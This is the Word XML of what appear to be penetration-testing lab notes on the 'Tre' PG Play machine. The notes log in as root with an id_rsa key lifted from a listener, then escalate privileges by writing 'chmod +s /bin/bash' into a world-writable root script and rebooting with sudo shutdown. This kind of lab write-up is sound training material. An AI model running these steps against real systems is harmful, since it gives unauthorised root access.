    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1416"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--sign signature </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: This is for packet identity,This is used to add a signature to the data payload of sent packets. This signature can be any arbitrary string of characters, and it will be included in the packet's data section.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EF2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1416"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-d : data size</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EF3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1416"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1501825"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="155" name="image152.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image152.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId654"/>
                    <a:srcRect b="65995" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1501825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1416"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Go back to listener, where private key should be </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EF5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1416"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4567238" cy="1888377"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="54" name="image63.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image63.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId655"/>
                    <a:srcRect b="60429" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4567238" cy="1888377"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1416"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now copy this id_rsa key and save it in your kali in a seperate new terminal, I have saved it as id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EF7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1416"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ssh -i id_rsa root@192.168.222.218</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EF8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EF9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EFA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EFB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EFC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wo3hlyd8scou" w:id="267"/>
      <w:bookmarkEnd w:id="267"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/sbin/shutdown</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/bin/check-system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EFD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EFE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId656">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Tre</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play, we saw that we had sudo privileges for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/sbin/shutdown</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and then we also noticed we had write privileges for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/check-system</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (we found through LinPeas).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EFF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F00">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/check-system </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is not a standard Linux Binary, so it's likely a custom one. And based on the name, I'm guessing it's something that is automatically run every time we shutdown and restart the computer. If we run "ps" we can actually see that it's running right now</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F01">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="791133"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="530" name="image517.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image517.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId657"/>
                    <a:srcRect b="54766" l="0" r="0" t="9452"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="791133"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F02">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F03">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Double checking the permissions, we see it is owned by root but we have the ability to read and write to it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F04">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="288"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tre@tre:/usr/bin$ ls -la check-system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F05">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="288"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-rw----rw- 1 root root 135 May 12  2020 check-system</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F06">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F07">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F08">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TLDR</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we are guessing that the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/check-system</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> will re-run once we do the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shutdown</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and so we will edit the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">check-system</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file to add </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SUID </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bit to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, so that we can run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as root. The reason </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">check-system</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is able to add the SUID bit to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is because the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">check-system </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file is likely run by root since it's owned by root. And we shutdown to activate this file. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F09">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F0A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1225"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, we can edit the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/check-system</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file to add the SUID bit to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F0C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1225"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +s /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1225"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3986213" cy="1450113"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="252" name="image250.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image250.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId658"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3986213" cy="1450113"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1225"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nd then once we shutdown the machine using "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo shutdown -r now</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
    </w:p>
